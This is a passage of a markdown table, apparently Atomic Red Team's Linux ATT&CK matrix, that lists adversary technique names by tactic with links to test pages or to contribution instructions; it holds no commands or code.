| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Sniffing](../../T1040/T1040.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Browser Extensions](../../T1176/T1176.md) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | [OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
